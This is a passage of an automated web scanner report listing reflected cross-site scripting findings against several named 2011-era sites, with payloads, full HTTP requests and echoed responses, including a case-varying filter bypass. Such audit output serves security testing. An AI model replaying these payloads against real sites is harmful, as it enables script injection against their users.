Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4984
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90">
...[SNIP]...

4.93. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f94'-alert(1)-'1e9875c14ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:39 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:39 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:39 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4939
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
4_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90');
clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/17
...[SNIP]...

4.94. http://media.match.com/cookE/geoip/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cbf1'%3balert(1)//38af7fabdfe was submitted in the target parameter. This input was echoed as 2cbf1';alert(1)//38af7fabdfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank2cbf1'%3balert(1)//38af7fabdfe&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:36 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4942
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
11ew_vsgeo_selectgenderzipbkgd_vpblubtn_110810_noy_728x90.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 80/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank2cbf1';alert(1)//38af7fabdfe' + '&clickTAG=' + escape('http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&ml_multi
...[SNIP]...

4.95. http://media.match.com/cookE/geoip/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4913e"><script>alert(1)</script>2aae3020d1a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank4913e"><script>alert(1)</script>2aae3020d1a&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:36 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4987
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn
...[SNIP]...
<A TARGET="_blank4913e"><script>alert(1)</script>2aae3020d1a" HREF="http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/f
...[SNIP]...

4.96. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>33aa020c94a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1296921569996&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-5526064907005908&slotname=Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a&page_slots=Technology_HomePage_237Top2&cust_params=Pageview%3DHomePage%26Permission%3DReg-regcom%26Flagged%3DNo%26Topic%3DTechnology%26WikiName%3Dhtcwiki%26UserRole%3DAnonymous%26ReturnVisitor%3Dfalse%26IsWPUser%3Dfalse%26AgeGroup%3D%26Gender%3D&cookie_enabled=1&ga_vid=1442931598.1296921570&ga_sid=1296921570&ga_hid=33117073&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&lmt=1296943170&dt=1296921570006&cc=12&biw=985&bih=996&ifi=1&adk=1893771767&channel=1000006000%2C1000001000%2C1000003000%2C1000003001%2C1000006001%2C1000006002%2C1000000118%2C1000001018%2C1000003019%2C1000006019&hints=technology%2C%20electronics%2C%20PC%2C%20laptop%2C%20cell%20phone%2C%20smart%20phone%2C%20PDA%2C%20new%20technology%2C%20technology%20news%2C%20wireless%20technology%2C%20&ad_type=text&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 16:02:06 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1453

GA_googleSetAdContentsBySlotForSync({"Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.97. https://signup.rackspacecloud.com/signup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://signup.rackspacecloud.com
Path:   /signup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833f8"><script>alert(1)</script>2f5afd2fed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup?833f8"><script>alert(1)</script>2f5afd2fed7=1 HTTP/1.1
Host: signup.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Feb 2011 15:25:22 GMT
Keep-Alive: timeout=15, max=139
Connection: close
Set-Cookie: symfony=3mbf46jt4ltiml2f8iqrbimlp5; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 17282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" id="windows">
<head>
<meta
...[SNIP]...
<a rel="nofollow" href="#" onclick="pageTracker._trackPageview('Chat/Button/Clicked');s=s_gi('rackspacemossotest');s.trackingServer='rackspace.112.2o7.net';s.prop11='signup.rackspacecloud.com/signup?833f8"><script>alert(1)</script>2f5afd2fed7=1 : : Live Chat Button';s.tl(this,'o','signup.rackspacecloud.com/signup?833f8">
...[SNIP]...

4.98. http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /scripts/wpcss/skin/meadowgreen/s.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5 was submitted in the REST URL parameter 4. This input was echoed as 8cc9a<img src=a onerror=alert(1)>1b1cc5a4bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/wpcss/skin/meadowgreen8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5/s.css?20110120041852 HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:00:20 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=1EF4A790692B899F9F7BAFD81DBBB10D; Path=/
Cache-Control: max-age=2592000
Expires: Mon, 07 Mar 2011 16:00:20 GMT
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Content-Length: 4350

.WPC-toolsMenu .btn_edit{
   background:url(../../../../../../../skins/meadowgreen8cc9a<img src=a onerror=alert(1)>1b1cc5a4bc5/img/btn_edit2.png?v=20110120041852) no-repeat top;
}
.WPC-toolsMenu a.btn_editLock{
   background:url(../../../../../../../skins/meadowgreen8cc9a<img src=a onerror=alert(1)>
...[SNIP]...

4.99. http://static.wetpaint.com/scripts/wpjsPage/page/p.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /scripts/wpjsPage/page/p.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db was submitted in the REST URL parameter 3. This input was echoed as c807d<img src=a onerror=alert(1)>89bbccc59db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/wpjsPage/pagec807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db/p.js?v=20110120041852 HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F6E1F8144EB4CA5D1686E51986AC76AA; wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=0B6E0BAD75294417BE18C8FE72F24144; Path=/
Cache-Control: max-age=2592000
Expires: Mon, 07 Mar 2011 15:59:38 GMT
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 103

The requested resource (/js/pages/pagec807d<img src=a onerror=alert(1)>89bbccc59db.js) is not available

4.100. http://static.wetpaint.com/staticComponent/iframe/track [memberData parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the memberData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2 was submitted in the memberData parameter. This input was echoed as e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:48 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=F2E506E6F40E7272E29FB7C4E180C4EC; Path=/
Content-Length: 2310
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:48 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
); //required since an iframe's referrer is not the same as the parent page's
                   globalGaTracker._setDomainName( rootDomain );
                   globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__-e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2',1);                                    
                   //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1)        
                   globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2);        
                   globalGaTracker._setCustomVar(4,"S
...[SNIP]...

4.101. http://static.wetpaint.com/staticComponent/iframe/track [pageType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9b2"%3balert(1)//6628d3ad43d was submitted in the pageType parameter. This input was echoed as 6c9b2";alert(1)//6628d3ad43d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage6c9b2"%3balert(1)//6628d3ad43d&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:51 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=220715F4738F4E6735C191E62267FD6E; Path=/
Content-Length: 2236
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:51 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
tiSiteVisits",1,2);        
                   globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3);    
                   globalGaTracker._setCustomVar(5,"Category",'Technology',3);    
                       globalGaTracker._trackPageview("/homePage6c9b2";alert(1)//6628d3ad43d");        
               } catch(err) {}
               
               
               try{
                   adChannelGaTracker = _gat._getTracker('UA-11780962-10');
   
                   adChannelGaTracker._setReferrerOverride(''); //required since an iframe's referr
...[SNIP]...

4.102. http://static.wetpaint.com/staticComponent/iframe/track [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe633'%3balert(1)//6bf50d8f015 was submitted in the ref parameter. This input was echoed as fe633';alert(1)//6bf50d8f015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=fe633'%3balert(1)//6bf50d8f015&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:53 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=32604A57F6152A669FC5F4E4513C5645; Path=/
Content-Length: 2264
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 15:59:53 GMT
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title>
   </head>
   <body>

...[SNIP]...
it('.') ; return [ [], s[s.length-2], s[ s.length-1 ] ].join('.') })();
               
               
               try{
                   globalGaTracker = _gat._getTracker("UA-11780962-1");
   
                   globalGaTracker._setReferrerOverride('fe633';alert(1)//6bf50d8f015'); //required since an iframe's referrer is not the same as the parent page's
                   globalGaTracker._setDomainName( rootDomain );
                   globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__
...[SNIP]...

4.103. http://static.wetpaint.com/staticComponent/iframe/track [segmentProfile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wetpaint.com
Path:   /staticComponent/iframe/track

Issue detail

The value of the segmentProfile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6811c'%3balert(1)//93742b54adf was submitted in the segmentProfile parameter. This input was echoed as 6811c';alert(1)//93742b54adf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticComponent/iframe/track?segmentProfile=UA-11780962-106811c'%3balert(1)//93742b54adf&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
